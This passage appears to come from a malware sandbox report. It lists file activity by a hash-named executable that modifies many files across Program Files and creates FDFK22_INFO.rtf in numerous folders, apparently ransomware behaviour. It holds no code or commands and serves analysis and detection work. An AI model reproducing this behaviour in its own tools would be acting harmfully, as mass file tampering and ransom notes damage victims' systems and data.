a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Journal.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dili a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\bin\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Accra a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Helsinki a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+5 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ru.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Seoul a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Monaco a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Manila a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Scoresbysund a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\ext\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zurich a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\plugins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Anadyr a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Menominee a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\PST8PDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Ojinaga a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\sound.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fa.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.bfc a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\TestUpdate.MTS a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8PDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\zh-TW.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\ConnectExpand.ADTS a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\rmiregistry.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla 